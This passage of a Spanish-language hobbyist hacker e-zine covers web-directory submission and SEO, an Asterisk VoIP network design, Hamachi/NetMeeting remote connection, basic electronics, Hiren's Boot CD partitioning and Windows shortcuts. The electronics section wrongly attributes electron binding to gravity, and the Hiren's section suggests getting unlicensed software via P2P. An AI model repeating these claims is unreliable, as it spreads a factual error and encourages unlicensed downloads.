razonables. El equipo del Open Directory agradece comentarios y observaciones sobre el directorio en general. Por favor muéstrenos su opinión y cómo podemos mejorar el servicio. Muchas gracias. Vaya a la página inicial del Open Directory en dmoz.org - comience aquí la búsqueda de la categoría a la que realizar su envío. ¿Cuánto tiempo tarda mi sitio en ser listado? Dependiendo del nivel de actividad de los editores en su área, pueden pasar dos semanas o más hasta que su sitio sea revisado. Aunque el ámbito y la cobertura del directorio sean tan extensos, tenemos muy en cuenta la calidad de ODP y estamos orgullosos de ser muy selectivos. No aceptamos todos los sitios, por lo tanto, si el suyo no es aceptado, por favor no se lo tome como algo personal. Nuestra meta es hacer un directorio tan útil como sea posible para nuestros usuarios, no servir como herramienta promocional para las

Page 27: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edicion Posicionamiento Web

entidades listadas ni incluir en el directorio todas, ni siquiera la mayoría de las páginas que posiblemente podrían ser listadas. ¿Tiene el ODP un servicio urgente que permita que mi página sea listada en menos tiempo? El ODP no tiene un servicio urgente similar a otros directorios comerciales, sin embargo, hay varias cosas que puede hacer para ayudar a que la revisión de su solicitud sea rápida. Primero, siga cuidadosamente las normas de envío. Segundo, debería revisar algunas de las políticas editoriales que usamos para listar los sitios. Una solicitud bien escrita y meditada tiene más posibilidades de ser revisada antes que una descuidada. Sin embargo, no recomendamos sugerir un sitio en varias categorías distintas con la esperanza de que acabe siendo listada en una o dos de ellas. Con esto, no conseguirá que Web sea listada antes, de hecho puede retrasar significativamente el proceso. Esto puede ser interpretado como spam y que al final su sitio no sea listado. ¿Cómo consigo que listen mi sitio en más de una categoría? Debería sugerir su sitio a una única categoría, la que considere más apropiada con sus contenidos. Por favor, sugiera su página una sola vez. Los editores de ODP se reservan el derecho de determinar en qué categoría o categorías será colocado su sitio utilizando su criterio editorial. ¿Cuánto tiempo tarda en aparecer mi sitio en los motores de búsqueda que usan los datos de ODP como AOL Search y Netscape Search? Una vez que su sitio ha sido listado en ODP, puede tardar dos semanas o más en aparecer en los motores de búsqueda que utilizan los datos de ODP. Es responsabilidad de esos buscadores utilizar la última versión de nuestros datos. ODP no tiene ningún control sobre cuándo terceras partes actualizan los datos provenientes de ODP. ¿A quién le pido ayuda sobre mi sitio y sobre la categoría más apropiada para que sea listado? Si después de explorar el enorme árbol de categorías, todavía no está seguro de dónde debería enviar su sitio, la mejor opción es sugerirlo en la categoría que piense que mejor refleja sus contenidos. Los editores tienen la capacidad de mover su sitio a otra categoría diferente o de crear una nueva si hiciera falta. ¿Qué debería hacer si la categoría a la que quiero enviar mi página no tiene un enlace "Agregar URL"? Unas pocas categorías tienen deshabilitado el enlace "Agregar URL" y no aceptan envíos ni listan sitios. Debería encontrar otra más específica explorando las subcategorías.

Url amigables Esto va enfocado a sitios dinámicos ¿Que es un Web dinámica y una estática? -Web estática muestra el mismo contenido siempre, para agregar contenido se tiene que modificar la Web a veces por completo aunque con el CSS se pueden hacer grandes logros -Web dinámica son creadas según al que te visita en la mayoría de los casos

se necesita base de datos recupera la información dependiendo ( en realidad las web no están hasta q alguien las visita ) la creación de paginas es mas fácil rápido tiene mas recursos que puedes lograr ¿Cual de las dos es mejor? La estática según he leído se indexa mejor que la dinámica por que a google no le gustan los parámetros o 'sessID' o 'sessionID' ejemplo web.php?parametro5=7&parametro2 los ? = & no le gustan y no te indexara y si lo llegara a indexar no te posicionara por q al buscar google se basa en url, titulo , contenido y link q apuntan hacia tu web (las metas actualmente no son necesarias pero no esta de mas ponerlas bien) ¿Dinamica es la mejor pero si no te indexa que se puede hacer ? path info o mod_rewrite en realidad son parecidas pero el mod_rewrite es mas flexible mod_rewrite para su uso necesitas servidor Apache con el módulo mod_rewrite activado y permitido el uso de .htaccess ejemplo tenemos http://tuweb.com/tipo=buscadores&google=googlebot seria http://tuweb.com/buscadores/google/googlebot.html en próximos se hará mas extenso este tema de mod_rewrite

Sitemaps Un buen sitemaps es siempre muy bueno tenerlo ya que con esta herramienta google te indexa mas rápido tu contenido fresco http://www.google.com/webmasters/sitemaps/?hl=es

Page rank y conseguir quien te enlace Esta creado por los fundadores google es un valor numérico que va de 0 a 10 conforme mas pagerank mas difícil es subirlo cuando alguien te linkea de la forma adecuada es como dar votos hacia tu Web. pero es mejor que no te linke aquellas webs que están penalizadas por google (baneadas) eso te perjudica también alguna q contenga demasiados enlaces hacia a otras webs el pagerank lo puedes ver bajándote la barra google y en algunos sitios y como deberían ser los links a continuación

Manejo correcto de los links La mejor forma de poner los links es link de texto ejemplo <Ahref=http://www.webom/quiero-a-google.html> quiero a google</A> seguramente le has dado en cache a busqueda en google algunas veces solo aparece solo se encontraron términos q apuntan hacia esta pagina

Herramientas google

Page 28: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edicion Posicionamiento Web

El mismo google te da herramientas para lograr una buena indexación

Asistente informativo sobre el estado del sitio Descubra si su sitio forma parte ya del índice de Google. Blog de Google destinado a webmasters (inglés) Las últimas novedades y las noticias más recientes relacionadas con los sistemas de rastreo e indexación de sitios web utilizados por Google. Herramientas para webmasters (incluido Sitemaps) Estadísticas, diagnósticos y administración de los procesos de rastreo e indexación que realiza Google de su sitio web, incluidas funciones como el envío de Sitemaps y la generación de informes. Foro de debate de Google para webmasters Entable conversación con otros webmasters y comparta sus ideas con nosotros. Envíe contenido a Google Descubra los métodos para enviar contenido a distintos servicios de Google, como Google Base y Google Libros. Centro de Asistencia para webmasters Consulte las respuestas a las preguntas más frecuentes formuladas acerca del rastreo, la indexación, la clasificación y otros muchos temas.

todo ello aquí http://www.google.com.mx/intl/es/webmasters/ mas capítulos posteriormente como robots.txt cuanto es lo máximo que debe pesar tu Web que no contenga errores como te puede penalizar y mas …

By XD (DJChileOut)

Servicios Google

Page 29: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición vozIP para empresas

Diseño para implementar VozIP en una Empresa by juca

Contenido: 1.- Introducción 2.- Requerimientos 3.- Recursos 4.- Cálculo del Tráfico 5.- Diseño y calculo

1.- Introducción

En vista del aumento de la demanda por implementar una red con VozIP es importante saber los elementos necesarios para poder realizarla. Así como también tomar en cuenta todos los cálculos que son necesarios para ponerla a funcionar de una manera correcta y que asegure una excelente comunicación. Lo planteado aquí es una solución real que se ejecutó y que utiliza un enlace WAN entre 2 ciudades grandes dentro de Ecuador (Quito - Guayaquil). 2.- Requerimientos

La petición de llamadas de los usuarios esta descrita en el gráfico y la hora máxima de actividad, a las tres de la tarde tenemos 200 personas llamando esto es en las horas pico y con un promedio de duración de las llamadas de 6 minutos. Red Lan Dentro del Mismo Edificio

La petición de llamadas de los usuarios esta descrita en el gráfico y la hora máxima de actividad, misma que es a las cuatro de la tarde de igual manera se hizo un promedio 12 personas hablando en un promedio de 6 minutos (Esto es entre Quito – Guayaquil) Red Wan Quito - Guayaquil

3.- Recursos Tipo de Recursos El tipo de recurso va a ser el 30% circuitos y el 70% paquetes. La empresa cuenta con cableado estructurado. Ingeniería de Tráfico El método para desarrollar esta infraestructura de telefonía IP será ASTERISK con un servidor GNU/Linux, con switch FXS – FXO. Base de Datos MySQL Se utilizarán teléfonos IP y Softphone Asterisk ofrece los siguientes servicios: Transferencia Ciega Pickup de Llamada Buzón de Voz Caller ID Música en espera Llamada en Espera Colas de llamada Timbres Distintos Conferencias Líneas digitales E1. El protocolo de comunicación será el SIP, esto será tanto en Quito como en Guayaquil Audio Codec será g.729 de 8 kbps

Page 30: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición vozIP para empresas

Se desea tener una buena calidad de servicio lo cual sin brinda ASTERISK. El grado de servicio será 1%.

4.- Cálculo del Tráfico Red LAN A = λ * tm A= (200*6)/60 = 20 Erlang Red WAN A = λ * tm A= (12*6)/60 = 1,2 Erlang Hora Pico En la red LAN es a las 15:00 horas se producen 200 llamadas con un promedio de 6 minutos.

En la red WAN es a las 16:00 horas se producen 12 llamadas con un promedio de 6 minutos.

Grado de Servicio El grado de servicio es 1% Número de Extensiones analógicas y digitales El número de extensiones analógicas serán 90 El número de extensiones digitales serán 210 Teléfonos IPs Necesitaremos 17 teléfonos IP

Necesitaremos 193 softphones

90 teléfonos analógicos

Page 31: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición vozIP para empresas

5.- Diseño y calculo

Para hacer el calculo de las troncales se hace con la ayuda de la calculadora ErlangB además que ya se tiene el calculo de los erlang que es 20

El ancho de Banda que ocupara en horas pico será de 283.5 Kbps, esto es entrante y la saliente tiene el mismo valor, lo da un total de banda para ocupara de 567 Kbps. Por lo tanto el canal para contratar entre Quito - Guayaquil será de 1024 Kbps.

Trafico será 20 Erlang El número de circuitos será 30 en este caso se contratará un E1** GOS 1% ** E1 en velocidad equivalente a 2048 Mbps ** E1 Permite 30 canales como máximo.

El ancho de banda que se requiere para integrarse a la red

WAN. Más Información: http://www.asteriskguru.com De igual manera para el ancho de banda se utilizo una

calculadora llamada Bandwidth Calculator. http://www.asteriskguru.com/tools/bandwidth_calculator.php

http://es.wikipedia.org/wiki/Asterisk http://www.digium.com/en/index.php Manual realizado por JUCA

Page 32: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Conectar 2 PCs

Conectar 2 PCs con NetMeeting y Hamachi by Logan_Doax

Antes que nada este tutorial sirve para los que tengan Windows xp Bueno este tutorial es un aporte 50% mío (Logan_Doax) y 50% de alfai; el proposito es que se puedan conectar 2 computadoras mediante el NetMeeting, un programa que permite compartir y enviar archivos o el mismo escritorio entre dos pc´s en red. Pero el primer inconveniente seria que, algunos cuentan con un modem de alta velocidad y/o un router, este pues cambia la dirección ip de una computadora y seria imposible conectarse a una con un router. Para eso utilizaremos un programa que se llama hamachi. Un programa que simula una red. Descarga http://www.hamachi.cc/download Una ves que lo hagamos descargado lo instalamos, esto es muy fácil. Ojo: si te pide si deseas instalar en modo Premium tu dale que no, mejor selecciona la casilla que dice que es free; esto para evitar futuros problemas. Ya instalado lo ejecutamos: Los más probable es que, como seria la primera vez que lo ejecutas te pedirá crear una red o un usuario para identificarte, hazlo y cuando termines pasas al siguiente paso.

Nos aparecerá una minipantalla como esta:

Como se señala, le damos clic al botón de power. Cargara unas cuantas cosas (3 en total). Y después les aparecerá algo así:

En mi caso, ya tengo redes unidas a mi hamachi; ustedes no se preocupen pueden agregar las que ustedes quieran. De hay presionamos el botón de en medio:

Y de hay a Crear nueva red ... Les aparecerá un recuadro como este:

Page 33: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Conectar 2 PCs

Crear la red es tan fácil y sencillo que solo basta con ponerle un nombre a la red y darle una contraseña. Pues la creas XD … Y después aparecerás en la ventana principal del hamachi. Ojo: ese numero que comienza con 5, es tu ip de hamachi, recuerda esto.

Bueno ahora queda configurar el NetMeeting: Vamos a inicio / ejecutar y escribimos conf

Si aparece un asistente le damos a siguiente, hasta que aparezca un cuadro que pide El nombre, dirección, e-mail, etc. Si quieres puedes poner datos falsos y tu correo seria lo único verdadero. XD Después de terminar el asistente te aparecerá la ventana del NetMeeting

Bueno de vuelta al hamachi; una ves que tú y el amigo o persona a la que te vallas a conectar haigan instalado el hamachi. Uno de los dos se una a la red creada por uno de ustedes; por ejemplo tu te unes a su red o el a ti. (El que se valla a conectar debe seguir el siguiente paso; en este caso tu te conectaras a el). Solo dale de nuevo al botón de en medio del hamachi, pero esta ves le das a unirse a la red.

Hay solo escribes el nombre de su red y la contraseña, después le das click a unirse, Y ya estarás en su red. Ahora al NetMeeting y te vas al siguiente campo:

Page 34: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Conectar 2 PCs

Hay ingresaras el numero ip de tu amigo se lo pides o te fijas en el hamachi (su ip esta al lado de su nombre de usuario o red). Y le das clic al botón de llamar. IMPORTANTE: tu amigo debe tener abierto el NetMeeting para que reciba la llamada. Una ves que tu amigo reciba la llamada le da a aceptar y estarán conectados. Ejemplo:

Una vez conectados pueden utilizar los botones que vienen en la ventana del NetMeeting para:

(Les diré la acción de izquierda a derecha) Compartir programa: Esta función nos sirve para compartir programas en ejecución y hasta el mismo escritorio. Ejemplo:

En este caso esta deshabilitado todo porque no estoy conectado a nadie. XD Conversación: su nombre lo dice puede iniciar un Chat entre ambos usuarios. XD

Page 35: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Conectar 2 PCs

Pizarra: abre una ventana de paint a ambos usuarios para que puedan compartir y dibujar en . una “pizarra” al mismo tiempo, los cambios que se hagan se verán en tiempo real Transferir Archivos: su nombre lo dice sirve para enviar archivos entre ambos usuarios.Una vez que se quieran desconectar solo dale clic al botón colgar: Y listo. También pueden intentarlo con otros S.O. aparte de Windows, pero el programa a utilizar para conectarse ya no seria el NetMeeting. Pero si se usaría el hamachi debido que se puede descargar para linux, Mac, etc

• Para la CUH E-zine Foro el-hacker.com . Utensilios y dispositivos para la instalación física de redes :

Conector RJ45 Ponchadora Cable UTP Tarjeta Modem

Page 36: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Introducción a la electrónica

Introducción a la electrónica By Elektro Bienvenidos , mi nombre es elektro y es mi misión guiarlos durante este viaje. De mi solo puedo decirles que he dedicado buena parte de mi tiempo al estudio tanto formal como informal de la electrónica y que la robótica es para todo aquel que ama la tecnológica, un fascinante paso más. Me tomo bastante tiempo decidir como debía comenzar esta sección, y tal vez debido a mis tiempos académicos no puedo evitar pensar que es necesaria una mínima introducción a la electrónica. Si, seguro que muchos que están leyendo esto ya saben que es un electrón y cuales son los efectos que produce su movimiento a través de los diferentes materiales, pero seguro que también hay mucha gente que no y prefiero dejar esta información básica planteada ahora, para que después sirva como referencia y siempre la tengamos a mano. Bueno, empecemos por el principio..... Nuestro amigo el átomo:

Esta representación sigue el modelo atómico de Bohr, el cual fue una mejora de modelos anteriores planteados por otros científicos. No vamos a entrar en mucha profundidad, solo vamos a decir que el átomo que vemos en el dibujo esta compuesto por un núcleo en el cual se encuentran los protones y neutrones (de cargas eléctricas positiva y neutra respectivamente) y en el exterior, orbitando este núcleo están los electrones (carga eléctrica negativa). En estado de equilibrio los electrones igualan en numero a los protones.

Corriente eléctrica. Electrones libres. Que pasa si un electrón escapa de su orbita? Debido a la excitación térmica normal que todos los materiales tienen o al calor externo, algunos electrones de la última orbita del átomo absorben una fracción de energía y gracias a ella vencen la fuerza gravitatoria que los mantiene en orbita al núcleo lo que les permite liberarse. Ellos permanecen libres sólo una fracción de segundo, pero en todo momento son billones de ellos los que se encuentran libres en el espacio inter-atómico en una sustancia particular. Si estos electrones se mueven en una misma dirección, tenemos lo que se conoce como flujo de corriente o corriente eléctrica. Para lograr que este movimiento de electrones se dé en un sentido o dirección, es necesario una fuente de energía externa (Ej. Batería), siendo que las cargas iguales se repelen y las diferentes se atraen, los electrones escaparan del borne negativo (-) de la batería para llegar el positivo (+) de la misma.

La cantidad de corriente eléctrica que circula por un conductor se denomina intensidad de corriente, se representa con la letra I, y nos indica la cantidad electrones que pasan por un punto en una determinada fracción de tiempo. La unidad de medida es el Amperio (A). Esta unidad es equivalente a un Coulomb / Segundo, el Coulomb es una unidad de carga eléctrica y equivale a 6.241 509 629 152 65×1018 electrones (muchos no?) . Llegamos al momento de tener que decir, que si bien la corriente es el resultado del movimiento de los electrones, por convención la corriente en un circuito se toma en sentido contrario. Se considera entonces que la corriente circula desde el borne positivo al negativo, cuando en realidad los electrones están circulando desde el borne negativo al positivo.

Page 37: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edicion Introducción a la electrónica

Materiales conductores y no conductores Algunos materiales tienen muchos más electrones libres que otros, esto es debido a que sus electrones están ligados más débilmente al núcleo, por lo tanto permiten que se establezca una corriente eléctrica a través de ellos . Estos materiales reciben el nombre de conductores. Los principales materiales conductores son: el oro, la plata, el cobre y los metales en general. Los materiales que tienen pocos electrones libres no permiten el flujo de electrones a través de ellos y reciben el nombre de materiales no conductores o aislantes, los mejores son: el vidrio, la porcelana, la mica, los materiales plásticos, etc. Los elementos que se encuentran en la situación intermedia entre los conductores y los no conductores son los denominados semiconductores el más conocido e importante es el silicio, y los mismos nos permite fabricar diodos, transistores, circuitos integrados, etc. Como dato el aire y el agua son aislantes también.... Si, el agua, pero CUIDADO, solo el agua pura desde el punto de vista químico (H2O), en cuanto el agua tiene sales y demás elementos (el agua corriente que tomamos los tiene) se convierte en un conductor. Tensión, corriente y resistencia eléctrica: Mucha, pero mucha gente confunde los conceptos de tensión y corriente eléctrica, y es lo mas normal realizar una comparación con el modelo hidráulico, que es mucho mas visible y nos permite, a partir de el, comprender su equivalente eléctrico. 

Veamos, tenemos un tanque de agua con su nivel a una altura h, un caudal q que baja por la cañería y una resistencia aportada por un grifo semi cerrado que denominaremos r. Cuanto mayor sea la altura h, mayor será la presión de agua y por lo tanto mayor será el caudal. Por otra parte si cierro aun mas el grifo, el caudal a la salida del sistema se reducirá. Si entienden esto bien, entonces solo tenemos que cambiar los nombres para pasar al caso eléctrico. La altura es el potencial eléctrico o tensión, el caudal es equivalente la corriente y la resistencia que opone el grifo al paso del agua se puede considerar análoga a una resistencia eléctrica (como la que tiene la plancha dentro) Entonces, pensando ahora todo en términos eléctricos, tenemos que la corriente es directamente proporcional a la tensión (si aumenta uno aumenta el otro y viceversa) e inversamente proporcional a la resistencia (a mayor resistencia, menor corriente). De aquí se desprende la ley mas básica y fundamental de la electricidad: La ley de Ohm

I = E / R Siendo E diferencia de potencial (tensión). Como comentario es bueno saber que esta es una ley “empírica” es decir que se obtuvo de manera experimental, que para este caso consiste simplemente en armar un circuito con una pila, una

resistencia y medir la corriente y la tensión de la misma para diferentes valores de resistencia. Bueno, para cerrar esta quizás “tediosa” parte teórica creo oportuno comentarles otra ley, que en la electrónica de estos días la sentimos constantemente, y es la: Ley de Joule

P = I² * R  

 

 

 

 

 

Esta ley nos da el porque de una resistencia, o cualquier aparato eléctrico, que en definitiva puede representarse en parte como una resistencia, levanta temperatura, obvio que es mucho más complejo que esto, pero esta ley rige la transformación de energía eléctrica en calor, siendo P la potencia calórico en Watts. Bueno, por esta entrega creo que es suficiente, en las próximas ya pondremos manos a la obra y veremos cosas más interesantes, circuitos, componentes y demás. Esta base era necesaria ya que sin ella no podemos hablar el mismo “idioma”. Hasta Pronto Mas información al respecto: http://csep10.phys.utk.edu/astr162/lect/light/bohr.html El modelo atomico de Bohr http://newton.cnice.mecd.es/3eso/electricidad3E/similhidraulico.htm

El equivalente hidraulico (animacion Java) By Elektro

Robot --> Una máquina que puede decirse tiene la capacidad de "sentir" y reaccionar y efectuar tareas complejas, actuando de cierta manera (inteligencia artificial) , segun las circuntstacias saca deducciones y toma desiciones , ejecutando labores especilizadas y mecanicnizadas, idealmente sin la supervision de humanos. Aunque actualmente se diseñan robots que intetan imitar los movimientos humanos para realizar trabajos altamente complejos y de maximo detalle y perfeccion, ellos raramente son parecidos a nuestra apariencia. Normalmente se usan los robots en la produccion de automóviles y computadoras en linea. Robótica . Rama de la ingeniería que tiene por objeto diseñar, programar y construir robots. lo s Robóticos trabajan dentro de una gama amplia de ramas ya sea científica abarcando aéreas como son: la ingeniería electrónica y la ingeniería mecánica, cibernética, biónica, e inteligencia artificial, buscando la finalidad de dotar las nuevas generaciones de robots capaces tanto de aprender, mayor capacidad sensorial, y por que no decir mejor destreza física, sin dejar atras que tambien se busca independencia, y flexibilidad . Nota Editorial

Page 38: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Uso del hiren´s boot - Partición de discos

Particionado y disco duro by |_ocutus

Hiren's boot CD

Hiren’s Boot CD es un cd d booteo q contiene variosprogramas d diagnostico como agentes d particionamientoy clonado d discos, medición d performance del sistema,recuperación d información, herramientas para MBR,herramientas para BIOS y muchas otras para reparardiversos problemas d pc. El mismo es 1 CD booteable, x lotanto es útil aun si el so no c puede inicializar. Poseeutilidades d similar funcionalidad agrupadas en lossubmenús y a pesar d q algunas hacen el mismo trabajonos dan posibilidades para elegir entre distintas interfacesd usuario.

El Hiren’s debería ser 1 herramienta indispensable paracualquier técnico o persona q pretenda reparar 1 pc,desde 1 simple particionamiento hasta recuperar sectoresdefectuosos en 1 hd pasando x cosas tan variadas comoborrado y/o recuperación d passwords tanto d sistemacomo d BIOS, soporte USB y SATA, posibilidad d levantar 1red fácilmente... todo en la + pura consola d dos. Todos losprogs contenidos en el CD también tienen su versión xseparado, pero la ventaja d este disco es justamente notener q depender d nada para poder usarlas, solamente 1lectora y booteo desde el CD (también c puede hacer enversión USB), cosas q cualquier pc tiene hoy en dia. Pueden ver la lista d progs contenidos en el mismo desdeacá: http://www.hiren.info/pages/bootcd La ultima versión a la fecha es la 9.1 q puede serdescargada desde aca: http://rapidshare.com/files/34106649/hiren_bootcd_9.1_en.rar

Tal vez cuando lean esto ya este x otra versión o el linkeste roto, para bajarlo buscar en google o en cualquierp2p ya q no hay pagina fija d donde bajarlo debido arestricciones d licencias y todas esas cosas ya qobviamente mucho del soft incluido no es free.

Creación del CD

1 vez q tengamos el archivo rar procedemos adescomprimirlo y nos encontramos, además d algunos txt, con 1 archivo con extensión ISO q es la imagen del Hiren’s. Además d 1 dir (keyboard patch) q sirve para cambiar la configuración del teclado q x default viene en ingles. Al q no le interese la conf d teclado puede quemar el ISOdirectamente con Nero. Para cambiar la configuración copiar en 1 mismo directorio el contenido d “keyboard patch” y la imagen ISO, ejecutar “Patch.bat” y seleccionar desde ahí el tipo dteclado. Una vez listo quemar la imagen con Nero o elprograma q les guste.

Uso del CD

Para poder bootear con el hirens lo 1ero es tener la unidad d CD como 1er dispositivo d booteo. Esto lo cambiamosdesde el setup d la pc, x lo gral lo encontramos en 1 menúllamado “Boot Device Priority” o algo parecido. Tendría qquedar algo así:

Guardar cambios, reiniciar y al bootear con Hiren’s nos sale 1 menu como este

: desde ahí podemos elegir entre iniciar el Hiren’s (StartBootCD) o seguir con el booteo normal del S.O. (Boot

Page 39: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Uso del hiren´s boot - Partición de discos From Hard Drive). Al entrar a la opción d Hiren’s nosencontramos con este menú:

seguido x este después d presionar “next”:

en este punto ya estamos listos para ejecutar cualquiera d las aplicaciones prácticamente, solo tenemos q elegir q es lo q queremos según el problema. Particionamiento de discos Los discos rígidos (también llamados “duros”) datan del año 1955, cuando fueron presentados con el IBM 305. A través del tiempo cambiaron bastante hasta llegar a lo q son hoy en día. Actualmente el disco esta formado físicamente x 1 grupo d platos concéntricos q giran a la vez a velocidad constante desde q c enciende la pc, cada uno d ellos tiene 2 superficies magnéticas, la superior y la inferior. Estos platos tienen 1 grupo d brazos alineados en la punta d los cuales están los cabezales d lectura/escritura, estos brazos pueden moverse hacia adentro y afuera para poder recorrer toda la superficie del disco.

Las 2 caras del plato son utilizables, x lo tanto cada brazo es doble y tiene 1 cabezal para la parte superior del mismo y 1 para la inferior. Los cabezales jamás tocan la superficie ya q la rayarían inmediatamente y c dañaría.

Como no creo q a nadie le interese el disco físico mucho + allá d esto vamos al sentido + practico d las cosas... El disco tal como lo compramos no puede ser reconocido x formatearla con algún sistema d archivos q sea reconocido x nuestro S.O., esto es lo q c llama la “estructura logica” del disco. La misma esta formada x el MBR (Master Boot Record o Sector d Arranque) y luego las particiones y el espacio sin particionar si es q hay alguno. El MBR esta ubicado en el sector 0 del disco y contiene la tabla d particiones además d 1 programa q lee la misma y delega el control al sector d arranque d la partición activa, si no hay ninguna muestra 1 mensaje d error. Tenemos varios tipos d particiones, la + común es la primaria q es la q c usa normalmente para instalar 1 S.O. Después tenemos particiones extendidas q c usan como contenedor para las unidades lógicas.

En el grafico vemos 1 estructura d disco donde comienza con el MBR en el arranque, sigue con 1 partición primaria típica y después tiene 1 partición extendida q contiene 2 unidades lógicas seguido x 1 espacio sin particionar. En este caso veríamos 3 unidades d disco en nuestro sistema suponiendo q todas tuvieran formato. Con esta base vamos a ver como podemos formatear y hasta alterar particiones con el Hiren’s.

Partition Magic Pro v8.5

Desde el menu principal del hirens vamos a: 1.Disk Partition Tools... y despues a: 1.Partition Magic Pro v8.5 Vamos a crear las mismas particiones del grafico d arriba en 1 disco d 2 Gb. Empezamos con el disco vacio sin partición ni formato alguno. Lo 1ero es crear una partición primaria d digamos... 500mb, entonces vamos a “Operations” y d ahí a “Create”, con esto c despliega el menú d creación d particiones al cual le tenemos q hacer algunos cambios. Vamos a hacer d cuenta q vamos a instalar 1 sistema XP... a una en 500mb va

Page 40: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Uso del hiren´s boot - Partición de discos a estar difícil... xD Create as cambiamos “Logical Partition” x “Primary partition” Partition Type NTFS Size 500Mb Cluster Size lo dejamos en “Default” NTFS Version 3.1 (Windows XP)

con esto ya tenemos la primaria, siguiendo el mismo procedimiento creamos las otras 2 como lógicas asignándoles tambien 500mb a c/u, para poder hacerlo hay q hacer click en “Unallocated” en la pantalla principal, o sea en el espacio sin usar. Todos los cambios q hacemos los vamos viendo en la parte superior en forma grafica y en la inferior en modo texto. Con las otras 2 particiones quedaria asi:

Ahí tendríamos la misma estructura q la del grafico salvo x el MBR q no c puede ver. Nótese también q al crear la partición en el mismo menú d creación q veíamos sobre la parte superior derecha tenemos la opción d comenzar la partición al comienzo o al fin del espacio vacio... con lo q podríamos dejar la parte sin particionar en medio del disco. Para q servirá esto? dirán... imagínense q el disco

tiene sectores rotos en el medio, la mejor solución es crear particiones alrededor d los mismos para evitar dichos sectores.

Otra opción muy interesante es la de Resize/Move, q nos permite cambiar el tamaño d 1 partición o moverla (siempre q sea posible) d manera muy fácil .Con esto ya pueden particionar tranquilamente y hacer unas cuantas cosas +... solo es cuestion d agarrar algun disco viejo y ponerse a experimentar. El Partition Magic es el + facil d usar pero sabiendo ya la teoria tienen otras utilidades para particionar + avanzadas y con + posibilidades dentro del mismo Hiren’s. Cuando el Partition no tenga secretos empiecen con las otras a ver q les parece. En los próximos numeros (si todo sale bien y los hay.. :P) vamos a seguir viendo las utilidades del Hiren’s... No rompan muchos hds!!! xDD

|_ocutus

Page 41: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Varios trucos WIndows

Trucos varios de Windows XP Editorial

Este articulo se trata de una serie de truquitos para el sistema operativo Windows, los cuales que uno aprende casi todos los días por ahí.

Este articulo se trata de una serie de truquitos para el sistema operativo Windows, los cuales que uno aprende casi todos los días por ahí.

PC sin mouse? PC sin mouse? A cuantos no nos ha pasado que el mouse deje de funcionar, y pues si no sabemos unas cositas, no podemos hacer nada, la tecla mas importante para empezar es la tecla Windows Tecla Win identificada en casi todos los teclados por el popular logo de las ventanitas.

A cuantos no nos ha pasado que el mouse deje de funcionar, y pues si no sabemos unas cositas, no podemos hacer nada, la tecla mas importante para empezar es la tecla Windows Tecla Win identificada en casi todos los teclados por el popular logo de las ventanitas.

Aquí no explico los métodos, solamente hago mención a las teclas que nos ayudaran a movernos y trabajar, casi que común y corriente

Aquí no explico los métodos, solamente hago mención a las teclas que nos ayudaran a movernos y trabajar, casi que común y corriente

Tecla Win o Windows: Ejecuta el menú inicio, además servir de combinación junto con otras teclas para los atajos de teclado del Windows.

Tecla Win o Windows: Ejecuta el menú inicio, además servir de combinación junto con otras teclas para los atajos de teclado del Windows.

Tab : En el explorador de archivos, nos mueve por la barra de direcciones y por el panel lateral, también puede ser usada en otras ventanas.

Tab : En el explorador de archivos, nos mueve por la barra de direcciones y por el panel lateral, también puede ser usada en otras ventanas.

Alt + F4 : Cierra la ventana actual. Alt + F4 : Cierra la ventana actual.

Flechas de desplazamiento: Nos ayudan a movernos por los distintas interfaces. Flechas de desplazamiento: Nos ayudan a movernos por los distintas interfaces.

Alt : Si la oprimimos sola, activa la barra de menús, acompañada de la primer letra de cada menú lo abrirá indefectiblemente

Alt : Si la oprimimos sola, activa la barra de menús, acompañada de la primer letra de cada menú lo abrirá indefectiblemente

Esc : Anula cualquier acción o evento indeseable, no cierra ventanas ni nada por el estilo. Esc : Anula cualquier acción o evento indeseable, no cierra ventanas ni nada por el estilo.

Win + L: Nos manda a la pantalla de bienvenida, evitando, así ser husmeados o que se yo! Win + L: Nos manda a la pantalla de bienvenida, evitando, así ser husmeados o que se yo!

Win + R : Abre la ventana Ejecutar. Win + R : Abre la ventana Ejecutar.

Win + U: Abre el Administrador de Utilidades Win + U: Abre el Administrador de Utilidades

Win + E: Ejecuta el explorador de archivos Win + E: Ejecuta el explorador de archivos

Win + F: Abre el buscador de Windows Win + F: Abre el buscador de Windows

Win + C : Muestra el dialogo de la conexión. Win + C : Muestra el dialogo de la conexión.

Alt +92 : Muestra el importante carácter ”\” Alt +92 : Muestra el importante carácter ”\”

Alt + 126: Muestra el carácter “~” otro importante Alt + 126: Muestra el carácter “~” otro importante

Print screen: Tecla que hace una captura todo lo que haya actualmente en la pantalla Print screen: Tecla que hace una captura todo lo que haya actualmente en la pantalla

Alt + Print screen: Hace una captura solamente de la ventana actual Alt + Print screen: Hace una captura solamente de la ventana actual

F1: Tecla de utilizad para la ayuda de Windows, y de casi todas las aplicaciones. F1: Tecla de utilizad para la ayuda de Windows, y de casi todas las aplicaciones.

Ctrl + Alt + Supr: En la pantalla de inicio, si lo oprimimos dos veces nos abre la cuenta de administrador, en el Windows normalmente llama al administrador de tareas.

Ctrl + Alt + Supr: En la pantalla de inicio, si lo oprimimos dos veces nos abre la cuenta de administrador, en el Windows normalmente llama al administrador de tareas.

Ya saben si se les daña el mouse, don´t fear. Ya saben si se les daña el mouse, don´t fear.

Como crear una Unidad virtual Como crear una Unidad virtual Esto es algo que es muy sencillo y también muy útil, además de ser muy fácil, voy a poner el código del archivo bat que crearemos para hacerlo y la explicación línea a línea

Esto es algo que es muy sencillo y también muy útil, además de ser muy fácil, voy a poner el código del archivo bat que crearemos para hacerlo y la explicación línea a línea

